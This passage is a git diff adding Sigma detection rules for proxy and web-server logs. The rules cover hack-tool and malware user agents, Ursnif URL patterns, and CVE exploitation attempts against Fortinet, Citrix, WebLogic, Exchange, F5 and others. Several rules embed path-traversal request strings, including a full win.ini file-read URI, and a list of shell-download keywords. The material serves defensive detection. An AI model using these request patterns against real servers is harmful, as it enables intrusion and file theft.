SIMBAR={7DB0F6DE-8DE7-4841-9084-28FA914B0F2E}; SLCC1; .N' + - 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' # only use in proxy logs - not for detection in web server logs + - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/4.0.221.6 Safari/525.13' + - 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MAAU)' # Payloads + + # Metasploit Update by Florian Roth 08.07.2017 + - 'Mozilla/5.0' + - 'Mozilla/4.0 (compatible; SPIPE/1.0' + # - 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)' # too many false positives expected + # - 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko' # too many false positives expected + - 'Mozilla/5.0 (Windows NT 6.3; rv:39.0) Gecko/20100101 Firefox/35.0' + - 'Sametime Community Agent' # Unknown if prone to false positives - used in https://goo.gl/gHZkeR + - 'X-FORWARDED-FOR' + - 'DotDotPwn v2.1' + - 'SIPDROID' + - 'Mozilla/5.0 (Windows NT 10.0; Win32; x32; rv:60.0)' # CobaltStrike https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/ + + # Empire + - 'Mozilla/6.0 (X11; Linux x86_64; rv:24.0) Gecko/20140205 Firefox/27.0 Iceweasel/25.3.0' + + # Exploits + - '*wordpress hash grabber*' + - '*exploit*' + condition: selection +fields: + - ClientIP + - c-uri + - c-useragent +falsepositives: + - Unknown +level: high +tags: + - attack.command_and_control + - attack.t1071.001 diff --git a/bin/main/rules/others_proxy/proxy_ua_hacktool.yml b/bin/main/rules/others_proxy/proxy_ua_hacktool.yml new file mode 100644 index 000000000..af6f393fc --- /dev/null +++ b/bin/main/rules/others_proxy/proxy_ua_hacktool.yml @@ -0,0 +1,79 @@ +title: Hack Tool User Agent +id: c42a3073-30fb-48ae-8c99-c23ada84b103 +status: test +description: Detects suspicious user agent strings user by hack tools in proxy logs +author: Florian Roth +references: + - https://github.com/fastly/waf_testbed/blob/master/templates/default/scanners-user-agents.data.erb + - http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules +date: 2017/07/08 +modified: 2021/11/27 +logsource: + category: proxy +detection: + selection: + c-useragent|contains: + # Vulnerability scanner and brute force tools + - '(hydra)' + - ' arachni/' + - ' BFAC ' + - ' brutus ' + - ' cgichk ' + - 'core-project/1.0' + - ' crimscanner/' + - 'datacha0s' + - 'dirbuster' + - 'domino hunter' + - 'dotdotpwn' + - 'FHScan Core' + - 'floodgate' + - 'get-minimal' + - 'gootkit auto-rooter scanner' + - 'grendel-scan' + - ' inspath ' + - 'internet ninja' + - 'jaascois' + - ' zmeu ' + - 'masscan' + - ' metis ' + - 'morfeus fucking scanner' + - 'n-stealth' + - 'nsauditor' + - 'pmafind' + - 'security scan' + - 'springenwerk' + - 'teh forest lobster' + - 'toata dragostea' + - ' vega/' + - 'voideye' + - 'webshag' + - 'webvulnscan' + - ' whcc/' + + # SQL Injection + - ' Havij' + - 'absinthe' + - 'bsqlbf' + - 'mysqloit' + - 'pangolin' + - 'sql power injector' + - 'sqlmap' + - 'sqlninja' + - 'uil2pn' + + # Hack tool + - 'ruler' # https://www.crowdstrike.com/blog/using-outlook-forms-lateral-movement-persistence/ + - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)' # SQLi Dumper + condition: selection +fields: + - ClientIP + - c-uri + - c-useragent +falsepositives: + - Unknown +level: high +tags: + - attack.initial_access + - attack.t1190 + - attack.credential_access + - attack.t1110 diff --git a/bin/main/rules/others_proxy/proxy_ua_malware.yml b/bin/main/rules/others_proxy/proxy_ua_malware.yml new file mode 100644 index 000000000..6931b219f --- /dev/null +++ b/bin/main/rules/others_proxy/proxy_ua_malware.yml @@ -0,0 +1,85 @@ +title: Malware User Agent +id: 5c84856b-55a5-45f1-826f-13f37250cf4e +status: test +description: Detects suspicious user agent strings used by malware in proxy logs +author: Florian Roth +references: + - http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules + - http://www.botopedia.org/search?searchword=scan&searchphrase=all + - https://networkraptor.blogspot.com/2015/01/user-agent-strings.html + - https://perishablepress.com/blacklist/ua-2013.txt + - https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents +date: 2017/07/08 +modified: 2021/11/27 +logsource: + category: proxy +detection: + selection: + c-useragent: + # RATs + - 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Chrome /53.0' # DargonOK + - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)' # Used by PlugX - base-lining recommended - https://community.rsa.com/thread/185439 + - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)' # Used by PlugX - base-lining recommended - https://community.rsa.com/thread/185439 + - 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)' # Used by PlugX - old - https://goo.gl/Yfjtk5 + - 'HttpBrowser/1.0' # HTTPBrowser RAT + - '*<|>*' # Houdini / Iniduoh / njRAT + - 'nsis_inetc (mozilla)' # ZeroAccess + - 'Wget/1.9+cvs-stable (Red Hat modified)' # Dyre / Upatre + # Ghost419 https://goo.gl/rW1yvZ + - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322)' + + # Malware + - '*zeroup*' # W32/Renos.Downloader + - 'Mozilla/5.0 (Windows NT 5.1 ; v.*' # Kazy + - '* adlib/*' # https://goo.gl/gcAHoh + - '* tiny' # Trojan Downloader + - '* BGroom *' # Trojan Downloader + - '* changhuatong' + - '* CholTBAgent' + - 'Mozilla/5.0 WinInet' + - 'RookIE/1.0' + - 'M' # HkMain + - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)' # Egamipload - old UA - probable prone to false positives + - 'Mozilla/4.0 (compatible;MSIE 7.0;Windows NT 6.0)' # Yakes + - 'backdoorbot' + - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30731)' # Sality + - 'Opera/8.81 (Windows NT 6.0; U; en)' # Sality + - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30729)' # Sality + - 'Opera' # Trojan Keragany + - 'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)' # Fareit + - 'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)' # Webshell's back connect + - 'MSIE' # Toby web shell + - '*(Charon; Inferno)' # Loki Bot + - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)' # Fareit / Pony + - 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)' # https://goo.gl/g43qjs + - 'Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1)' # MacControl malware https://goo.gl/sqY3Ja https://www.symantec.com/connect/blogs/osxmacontrol-back-it-again + - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' # used by Zebrocy malware https://app.any.run/tasks/7d7fa4a0-6970-4428-828b-29572abf9ceb/ + # Ursnif + - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)' + - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)' + # Emotet + - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; InfoPath.3)' # https://twitter.com/webbthewombat/status/1225827092132179968 + # Others + - '* pxyscand*' + - '* asd' + - '* mdms' + - 'sample' + - 'nocase' + - 'Moxilla' + - 'Win32 *' + - '*Microsoft Internet Explorer*' + - 'agent *' + - 'AutoIt' # Suspicious - base-lining recommended + - 'IczelionDownLoad' + - 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 10.0; .NET4.0C; .NET4.0E; Tablet PC 2.0)' # https://unit42.paloaltonetworks.com/thor-plugx-variant/ + condition: selection +fields: + - ClientIP + - c-uri + - c-useragent +falsepositives: + - Unknown +level: high +tags: + - attack.command_and_control + - attack.t1071.001 diff --git a/bin/main/rules/others_proxy/proxy_ua_susp.yml b/bin/main/rules/others_proxy/proxy_ua_susp.yml new file mode 100644 index 000000000..8ec2f44f2 --- /dev/null +++ b/bin/main/rules/others_proxy/proxy_ua_susp.yml @@ -0,0 +1,47 @@ +title: Suspicious User Agent +id: 7195a772-4b3f-43a4-a210-6a003d65caa1 +status: experimental +description: Detects suspicious malformed user agent strings in proxy logs +author: Florian Roth +date: 2017/07/08 +modified: 2022/05/06 +references: + - https://github.com/fastly/waf_testbed/blob/master/templates/default/scanners-user-agents.data.erb +logsource: + category: proxy +detection: + selection1: + c-useragent|startswith: + - 'user-agent' # User-Agent: User-Agent: + - 'Mozilla/3.0 ' + - 'Mozilla/2.0 ' + - 'Mozilla/1.0 ' + - 'Mozilla ' # missing slash + - ' Mozilla/' # leading space + - 'Mozila/' # single 'l' + - 'Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol' # https://twitter.com/NtSetDefault/status/1303643299509567488 + selection2: + c-useragent|contains: + - ' (compatible;MSIE ' # typical typo - missing space + - '.0;Windows NT ' # typical typo - missing space + - 'loader' # https://twitter.com/securityonion/status/1522614635152744453?s=20&t=gHyPTSq5A27EqKwrCd9ohg + selection3: + c-useragent: + - '_' + - 'CertUtil URL Agent' # https://twitter.com/stvemillertime/status/985150675527974912 + - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0)' # CobaltStrike Beacon https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/ + - 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0' # used by APT28 malware https://threatvector.cylance.com/en_us/home/inside-the-apt28-dll-backdoor-blitz.html + - 'HTTPS' # https://twitter.com/stvemillertime/status/1204437531632250880 + falsepositives: + c-useragent: 'Mozilla/3.0 * Acrobat *' # Acrobat with linked content + condition: ( selection1 or selection2 or selection3 ) and not falsepositives +fields: + - ClientIP + - c-uri + - c-useragent +falsepositives: + - Unknown +level: high +tags: + - attack.command_and_control + - attack.t1071.001 diff --git a/bin/main/rules/others_proxy/proxy_ursnif_malware_c2_url.yml b/bin/main/rules/others_proxy/proxy_ursnif_malware_c2_url.yml new file mode 100644 index 000000000..c0068e710 --- /dev/null +++ b/bin/main/rules/others_proxy/proxy_ursnif_malware_c2_url.yml @@ -0,0 +1,36 @@ +title: Ursnif Malware C2 URL Pattern +id: 932ac737-33ca-4afd-9869-0d48b391fcc9 +status: stable +description: Detects Ursnif C2 traffic. +references: + - https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html +author: Thomas Patzke +date: 2019/12/19 +modified: 2021/08/09 +logsource: + category: proxy +detection: + b64encoding: + c-uri|contains: + - '_2f' + - '_2b' + urlpatterns: + c-uri|contains|all: + - '.avi' + - '/images/' + condition: b64encoding and urlpatterns +fields: + - c-ip + - c-uri + - sc-bytes + - c-ua +falsepositives: + - Unknown +level: critical +tags: + - attack.initial_access + - attack.t1566.001 + - attack.execution + - attack.t1204.002 + - attack.command_and_control + - attack.t1071.001 diff --git a/bin/main/rules/others_proxy/proxy_ursnif_malware_download_url.yml b/bin/main/rules/others_proxy/proxy_ursnif_malware_download_url.yml new file mode 100644 index 000000000..c5c95890e --- /dev/null +++ b/bin/main/rules/others_proxy/proxy_ursnif_malware_download_url.yml @@ -0,0 +1,25 @@ +title: Ursnif Malware Download URL Pattern +id: a36ce77e-30db-4ea0-8795-644d7af5dfb4 +status: stable +description: Detects download of Ursnif malware done by dropper documents. +author: Thomas Patzke +date: 2019/12/19 +modified: 2021/08/09 +logsource: + category: proxy +detection: + selection: + c-uri|contains|all: + - '/' + - '.php?l=' + c-uri|endswith: '.cab' + sc-status: 200 + condition: selection +fields: + - c-ip + - c-uri + - sc-bytes + - c-ua +falsepositives: + - Unknown +level: high diff --git a/bin/main/rules/others_web/web_apache_segfault.yml b/bin/main/rules/others_web/web_apache_segfault.yml new file mode 100644 index 000000000..13ad886db --- /dev/null +++ b/bin/main/rules/others_web/web_apache_segfault.yml @@ -0,0 +1,21 @@ +title: Apache Segmentation Fault +id: 1da8ce0b-855d-4004-8860-7d64d42063b1 +status: test +description: Detects a segmentation fault error message caused by a creashing apache worker process +author: Florian Roth +references: + - http://www.securityfocus.com/infocus/1633 +date: 2017/02/28 +modified: 2021/11/27 +logsource: + service: apache +detection: + keywords: + - 'exit signal Segmentation Fault' + condition: keywords +falsepositives: + - Unknown +level: high +tags: + - attack.impact + - attack.t1499.004 diff --git a/bin/main/rules/others_web/web_apache_threading_error.yml b/bin/main/rules/others_web/web_apache_threading_error.yml new file mode 100644 index 000000000..fdbf79f30 --- /dev/null +++ b/bin/main/rules/others_web/web_apache_threading_error.yml @@ -0,0 +1,18 @@ +title: Apache Threading Error +id: e9a2b582-3f6a-48ac-b4a1-6849cdc50b3c +status: test +description: Detects an issue in apache logs that reports threading related errors +author: Florian Roth +references: + - https://github.com/hannob/apache-uaf/blob/master/README.md +date: 2019/01/22 +modified: 2021/11/27 +logsource: + service: apache +detection: + keywords: + - '__pthread_tpp_change_priority: Assertion `new_prio == -1 || (new_prio >= fifo_min_prio && new_prio <= fifo_max_prio)' + condition: keywords +falsepositives: + - 3rd party apache modules - https://bz.apache.org/bugzilla/show_bug.cgi?id=46185 +level: medium diff --git a/bin/main/rules/others_web/web_cve_2010_5278_exploitation_attempt.yml b/bin/main/rules/others_web/web_cve_2010_5278_exploitation_attempt.yml new file mode 100644 index 000000000..7b97de252 --- /dev/null +++ b/bin/main/rules/others_web/web_cve_2010_5278_exploitation_attempt.yml @@ -0,0 +1,24 @@ +title: CVE-2010-5278 Exploitation Attempt +id: a4a899e8-fd7a-49dd-b5a8-7044def72d61 +author: Subhash Popuri (@pbssubhash) +date: 2021/08/25 +status: experimental +description: MODx manager - Local File Inclusion:Directory traversal vulnerability + in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and + possibly earlier, when magic_quotes_gpc is disabled, allows remote attackers to + read arbitrary files via a .. (dot dot) in the class_key parameter. +references: + - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver +detection: + selection: + c-uri|contains: /manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00 + condition: selection +falsepositives: + - Scanning from Nuclei + - Unknown +tags: + - attack.initial_access + - attack.t1190 +level: critical diff --git a/bin/main/rules/others_web/web_cve_2018_13379_fortinet_preauth_read_exploit.yml b/bin/main/rules/others_web/web_cve_2018_13379_fortinet_preauth_read_exploit.yml new file mode 100644 index 000000000..3c777528b --- /dev/null +++ b/bin/main/rules/others_web/web_cve_2018_13379_fortinet_preauth_read_exploit.yml @@ -0,0 +1,27 @@ +title: Fortinet CVE-2018-13379 Exploitation +id: a2e97350-4285-43f2-a63f-d0daff291738 +status: test +description: Detects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs +author: Bhabesh Raj +references: + - https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/ +date: 2020/12/08 +modified: 2022/01/07 +logsource: + category: webserver +detection: + selection: + c-uri|contains|all: + - 'lang=/../../' + - '/dev/cmdb/sslvpn_websession' + condition: selection +fields: + - client_ip + - url + - response +falsepositives: + - Unknown +level: critical +tags: + - attack.initial_access + - attack.t1190 diff --git a/bin/main/rules/others_web/web_cve_2018_2894_weblogic_exploit.yml b/bin/main/rules/others_web/web_cve_2018_2894_weblogic_exploit.yml new file mode 100644 index 000000000..40b443f54 --- /dev/null +++ b/bin/main/rules/others_web/web_cve_2018_2894_weblogic_exploit.yml @@ -0,0 +1,28 @@ +title: Oracle WebLogic Exploit +id: 37e8369b-43bb-4bf8-83b6-6dd43bda2000 +status: experimental +description: Detects access to a webshell dropped into a keystore folder on the WebLogic server +author: Florian Roth +date: 2018/07/22 +modified: 2021/08/09 +references: + - https://twitter.com/pyn3rd/status/1020620932967223296 + - https://github.com/LandGrey/CVE-2018-2894 +logsource: + category: webserver +detection: + selection: + c-uri: '*/config/keystore/*.js*' + condition: selection +fields: + - c-ip + - c-dns +falsepositives: + - Unknown +level: critical +tags: + - attack.t1190 + - attack.initial_access + - attack.persistence + - attack.t1505.003 + - cve.2018.2894 diff --git a/bin/main/rules/others_web/web_cve_2019_11510_pulsesecure_exploit.yml b/bin/main/rules/others_web/web_cve_2019_11510_pulsesecure_exploit.yml new file mode 100644 index 000000000..c1a5ad7ad --- /dev/null +++ b/bin/main/rules/others_web/web_cve_2019_11510_pulsesecure_exploit.yml @@ -0,0 +1,26 @@ +title: Pulse Secure Attack CVE-2019-11510 +id: 2dbc10d7-a797-49a8-8776-49efa6442e60 +status: test +description: Detects CVE-2019-11510 exploitation attempt - URI contains Guacamole +author: Florian Roth +references: + - https://www.exploit-db.com/exploits/47297 +date: 2019/11/18 +modified: 2021/11/27 +logsource: + category: webserver +detection: + selection: + c-uri: '*?/dana/html5acc/guacamole/*' + condition: selection +fields: + - client_ip + - vhost + - url + - response +falsepositives: + - Unknown +level: critical +tags: + - attack.initial_access + - attack.t1190 diff --git a/bin/main/rules/others_web/web_cve_2019_19781_citrix_exploit.yml b/bin/main/rules/others_web/web_cve_2019_19781_citrix_exploit.yml new file mode 100644 index 000000000..6a1494cd8 --- /dev/null +++ b/bin/main/rules/others_web/web_cve_2019_19781_citrix_exploit.yml @@ -0,0 +1,34 @@ +title: Citrix Netscaler Attack CVE-2019-19781 +id: ac5a6409-8c89-44c2-8d64-668c29a2d756 +status: test +description: Detects CVE-2019-19781 exploitation attempt against Citrix Netscaler, Application Delivery Controller and Citrix Gateway Attack +author: Arnim Rupp, Florian Roth +references: + - https://support.citrix.com/article/CTX267679 + - https://support.citrix.com/article/CTX267027 + - https://isc.sans.edu/diary/25686 + - https://twitter.com/mpgn_x64/status/1216787131210829826 + - https://github.com/x1sec/x1sec.github.io/blob/master/CVE-2019-19781-DFIR.md +date: 2020/01/02 +modified: 2021/11/27 +logsource: + category: webserver + definition: 'Make sure that your Netscaler appliance logs all kinds of attacks (test with http://your-citrix-gw.net/robots.txt). The directory traversal with ../ might not be needed on certain cloud instances or for authenticated users, so we also check for direct paths. All scripts in portal/scripts are exploitable except logout.pl.' +detection: + selection: + c-uri: + - '*/../vpns/*' + - '*/vpns/cfg/smb.conf' + - '*/vpns/portal/scripts/*.pl*' + condition: selection +fields: + - client_ip + - vhost + - url + - response +falsepositives: + - Unknown +level: critical +tags: + - attack.initial_access + - attack.t1190 diff --git a/bin/main/rules/others_web/web_cve_2019_3398_confluence.yml b/bin/main/rules/others_web/web_cve_2019_3398_confluence.yml new file mode 100644 index 000000000..ffe38b48b --- /dev/null +++ b/bin/main/rules/others_web/web_cve_2019_3398_confluence.yml @@ -0,0 +1,27 @@ +title: Confluence Exploitation CVE-2019-3398 +id: e9bc39ae-978a-4e49-91ab-5bd481fc668b +status: test +description: Detects the exploitation of the Confluence vulnerability described in CVE-2019-3398 +author: Florian Roth +references: + - https://devcentral.f5.com/s/articles/confluence-arbitrary-file-write-via-path-traversal-cve-2019-3398-34181 +date: 2020/05/26 +modified: 2021/11/27 +logsource: + category: webserver +detection: + selection: + cs-method: 'POST' + c-uri|contains|all: + - '/upload.action' + - 'filename=../../../../' + condition: selection +fields: + - c-ip + - c-dns +falsepositives: + - Unknown +level: critical +tags: + - attack.initial_access + - attack.t1190 diff --git a/bin/main/rules/others_web/web_cve_2020_0688_exchange_exploit.yml b/bin/main/rules/others_web/web_cve_2020_0688_exchange_exploit.yml new file mode 100644 index 000000000..1c086ad22 --- /dev/null +++ b/bin/main/rules/others_web/web_cve_2020_0688_exchange_exploit.yml @@ -0,0 +1,24 @@ +title: CVE-2020-0688 Exploitation Attempt +id: 7c64e577-d72e-4c3d-9d75-8de6d1f9146a +status: test +description: Detects CVE-2020-0688 Exploitation attempts +author: NVISO +references: + - https://github.com/Ridter/cve-2020-0688 +date: 2020/02/27 +modified: 2021/11/27 +logsource: + category: webserver +detection: + selection: + c-uri|contains|all: + - '/ecp/default.aspx' + - '__VIEWSTATEGENERATOR=' + - '__VIEWSTATE=' + condition: selection +falsepositives: + - Unknown +level: high +tags: + - attack.initial_access + - attack.t1190 diff --git a/bin/main/rules/others_web/web_cve_2020_0688_msexchange.yml b/bin/main/rules/others_web/web_cve_2020_0688_msexchange.yml new file mode 100644 index 000000000..4f5c9c8ba --- /dev/null +++ b/bin/main/rules/others_web/web_cve_2020_0688_msexchange.yml @@ -0,0 +1,29 @@ +title: CVE-2020-0688 Exchange Exploitation via Web Log +id: fce2c2e2-0fb5-41ab-a14c-5391e1fd70a5 +status: test +description: Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688 +author: Florian Roth +references: + - https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/ +date: 2020/02/29 +modified: 2021/11/27 +logsource: + category: webserver +detection: + selection1: + cs-method: 'GET' + c-uri|contains: + - '/ecp/' + - '/owa/' + selection2: + c-uri|contains: '__VIEWSTATE=' + condition: selection1 and selection2 +fields: + - c-ip + - c-dns +falsepositives: + - Unknown +level: critical +tags: + - attack.initial_access + - attack.t1190 diff --git a/bin/main/rules/others_web/web_cve_2020_10148_solarwinds_exploit.yml b/bin/main/rules/others_web/web_cve_2020_10148_solarwinds_exploit.yml new file mode 100644 index 000000000..f514764a6 --- /dev/null +++ b/bin/main/rules/others_web/web_cve_2020_10148_solarwinds_exploit.yml @@ -0,0 +1,31 @@ +title: CVE-2020-10148 SolarWinds Orion API Auth Bypass +id: 5a35116f-43bc-4901-b62d-ef131f42a9af +status: test +description: Detects CVE-2020-10148 SolarWinds Orion API authentication bypass attempts +author: Bhabesh Raj +references: + - https://kb.cert.org/vuls/id/843464 +date: 2020/12/27 +modified: 2022/01/07 +logsource: + category: webserver +detection: + selection: + c-uri|contains: + - 'WebResource.axd' + - 'ScriptResource.axd' + - 'i18n.ashx' + - 'Skipi18n' + valid_request_1: + c-uri|contains: 'Orion/Skipi18n/Profiler/' + valid_request_2: + c-uri|contains: + - 'css.i18n.ashx' + - 'js.i18n.ashx' + condition: selection and not valid_request_1 and not valid_request_2 +falsepositives: + - Unknown +level: critical +tags: + - attack.initial_access + - attack.t1190 diff --git a/bin/main/rules/others_web/web_cve_2020_14882_weblogic_exploit.yml b/bin/main/rules/others_web/web_cve_2020_14882_weblogic_exploit.yml new file mode 100644 index 000000000..ad25c59e9 --- /dev/null +++ b/bin/main/rules/others_web/web_cve_2020_14882_weblogic_exploit.yml @@ -0,0 +1,29 @@ +title: Oracle WebLogic Exploit CVE-2020-14882 +id: 85d466b0-d74c-4514-84d3-2bdd3327588b +status: test +description: Detects exploitation attempts on WebLogic servers +author: Florian Roth +references: + - https://isc.sans.edu/diary/26734 + - https://twitter.com/jas502n/status/1321416053050667009?s=20 + - https://twitter.com/sudo_sudoka/status/1323951871078223874 +date: 2020/11/02 +modified: 2021/11/27 +logsource: + category: webserver +detection: + selection: + c-uri|contains: + - '/console/images/%252E%252E%252Fconsole.portal' + - '/console/css/%2e' + condition: selection +fields: + - c-ip + - c-dns +falsepositives: + - Unknown +level: high +tags: + - attack.t1190 + - attack.initial_access + - cve.2020.14882 diff --git a/bin/main/rules/others_web/web_cve_2020_28188_terramaster_rce_exploit.yml b/bin/main/rules/others_web/web_cve_2020_28188_terramaster_rce_exploit.yml new file mode 100644 index 000000000..2f2468e9e --- /dev/null +++ b/bin/main/rules/others_web/web_cve_2020_28188_terramaster_rce_exploit.yml @@ -0,0 +1,36 @@ +title: TerraMaster TOS CVE-2020-28188 +id: 15c312b9-00d0-4feb-8870-7d940a4bdc5e +status: experimental +description: Detects the exploitation of the TerraMaster TOS vulnerability described in CVE-2020-28188 +author: Bhabesh Raj +date: 2021/01/25 +references: + - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/ + - https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/ +logsource: + category: webserver +detection: + base_url: + cs-method: 'GET' + c-uri|contains|all: + - '/include/makecvs.php' + - '?Event=' + payload: + c-uri|contains: + - 'curl' + - 'wget' + - '.py' + - '.sh' + - 'chmod' + - '_GET' + condition: base_url and payload +fields: + - c-ip + - c-dns +falsepositives: + - Unknown +level: high +tags: + - attack.t1190 + - attack.initial_access + - cve.2020.28188 diff --git a/bin/main/rules/others_web/web_cve_2020_3452_cisco_asa_ftd.yml b/bin/main/rules/others_web/web_cve_2020_3452_cisco_asa_ftd.yml new file mode 100644 index 000000000..8a63e9291 --- /dev/null +++ b/bin/main/rules/others_web/web_cve_2020_3452_cisco_asa_ftd.yml @@ -0,0 +1,35 @@ +title: Cisco ASA FTD Exploit CVE-2020-3452 +id: aba47adc-4847-4970-95c1-61dce62a8b29 +status: experimental +description: Detects exploitation attempts on Cisco ASA FTD systems exploiting CVE-2020-3452 with a status code of 200 (sccessful exploitation) +author: Florian Roth +date: 2021/01/07 +references: + - https://twitter.com/aboul3la/status/1286012324722155525 + - https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter +logsource: + category: webserver +detection: + selection_endpoint: + c-uri|contains: + - '+CSCOT+/translation-table' + - '+CSCOT+/oem-customization' + selection_path_select: + c-uri|contains: + - '&textdomain=/' + - '&textdomain=%' + - '&name=/' + - '&name=%' + select_status_code: + sc-status: 200 + condition: selection_endpoint and selection_path_select and select_status_code +fields: + - c-ip + - c-dns +falsepositives: + - Unknown +level: high +tags: + - attack.t1190 + - attack.initial_access + - cve.2020.3452 diff --git a/bin/main/rules/others_web/web_cve_2020_5902_f5_bigip.yml b/bin/main/rules/others_web/web_cve_2020_5902_f5_bigip.yml new file mode 100644 index 000000000..6065733fa --- /dev/null +++ b/bin/main/rules/others_web/web_cve_2020_5902_f5_bigip.yml @@ -0,0 +1,33 @@ +title: CVE-2020-5902 F5 BIG-IP Exploitation Attempt +id: 44b53b1c-e60f-4a7b-948e-3435a7918478 +status: test +description: Detects the exploitation attempt of the vulnerability found in F5 BIG-IP and described in CVE-2020-5902 +author: Florian Roth +references: + - https://support.f5.com/csp/article/K52145254 + - https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/ + - https://twitter.com/yorickkoster/status/1279709009151434754 + - https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/ +date: 2020/07/05 +modified: 2021/11/27 +logsource: + category: webserver +detection: + selection_base: + c-uri|contains: + - '/tmui/' + - '/hsqldb' + selection_traversal: + c-uri|contains: + - '..;/' + - '.jsp/..' + condition: selection_base and selection_traversal +fields: + - c-ip + - c-dns +falsepositives: + - Unknown +level: critical +tags: + - attack.initial_access + - attack.t1190 diff --git a/bin/main/rules/others_web/web_cve_2020_8193_8195_citrix_exploit.yml b/bin/main/rules/others_web/web_cve_2020_8193_8195_citrix_exploit.yml new file mode 100644 index 000000000..4e74868c8 --- /dev/null +++ b/bin/main/rules/others_web/web_cve_2020_8193_8195_citrix_exploit.yml @@ -0,0 +1,33 @@ +title: Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195 +description: Detects exploitation attempt against Citrix Netscaler, Application Delivery Controller (ADS) and Citrix Gateway exploiting vulnerabilities reported as CVE-2020-8193 and CVE-2020-8195 +id: 0d0d9a8a-a49e-4e27-b061-7ce4b936cfb7 +author: Florian Roth +status: experimental +date: 2020/07/10 +modified: 2021/08/09 +references: + - https://support.citrix.com/article/CTX276688 + - https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/ + - https://dmaasland.github.io/posts/citrix.html +logsource: + category: webserver +detection: + selection1: + c-uri|contains: '/rapi/filedownload?filter=path:%2F' + selection2: + c-uri|contains|all: + - '/pcidss/report' + - 'type=all_signatures' + - 'sig_name=_default_signature_' + condition: 1 of selection* +fields: + - client_ip + - vhost + - url + - response +falsepositives: + - Unknown +level: critical +tags: + - attack.initial_access + - attack.t1190 diff --git a/bin/main/rules/others_web/web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml b/bin/main/rules/others_web/web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml new file mode 100644 index 000000000..32a1aea47 --- /dev/null +++ b/bin/main/rules/others_web/web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml @@ -0,0 +1,40 @@ +title: Arcadyan Router Exploitations +id: f0500377-bc70-425d-ac8c-e956cd906871 +status: experimental +description: Detects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091. +references: + - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 + - https://www.tenable.com/security/research/tra-2021-13 + - https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild +author: Bhabesh Raj +date: 2021/08/24 +modified: 2021/08/25 +falsepositives: + - Unknown +level: critical +tags: + - attack.initial_access + - attack.t1190 + - cve.2021.20090 + - cve.2021.20091 +logsource: + category: webserver +detection: + path_traversal: + # CVE-2021-20090 (Bypass Auth: Path Traversal) + c-uri|contains: '..%2f' + config_file_inj: + c-uri|contains|all: # Chaining of CVE-2021-20090 (Bypass 